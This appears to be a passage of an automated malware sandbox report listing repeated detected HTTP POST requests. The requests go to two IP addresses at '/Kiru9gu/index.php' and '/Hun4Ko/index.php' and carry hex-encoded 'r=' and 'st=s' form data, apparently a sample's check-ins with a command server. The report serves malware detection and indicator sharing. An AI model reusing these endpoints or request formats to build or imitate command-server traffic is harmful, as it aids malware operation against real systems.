                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
